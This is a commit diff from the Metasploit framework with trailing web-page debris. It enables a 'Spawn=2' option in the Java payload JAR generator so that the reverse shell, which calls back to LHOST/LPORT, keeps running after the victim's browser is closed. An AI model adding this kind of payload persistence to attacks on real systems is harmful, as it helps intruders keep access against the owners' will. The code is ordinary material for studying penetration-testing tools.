spawn out into another process so killing the browser won't drop our shell
git-svn-id: file:///home/svn/framework3/trunk@10091 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
56396a6d8b
commit
eda50fc89e
|
@ -43,7 +43,7 @@ module Metasploit3
|
||||||
|
|
||||||
def generate_jar
|
def generate_jar
|
||||||
config = ""
|
config = ""
|
||||||
#config << "Spawn=2\n"
|
config << "Spawn=2\n"
|
||||||
config << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
|
config << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
|
||||||
config << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
|
config << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue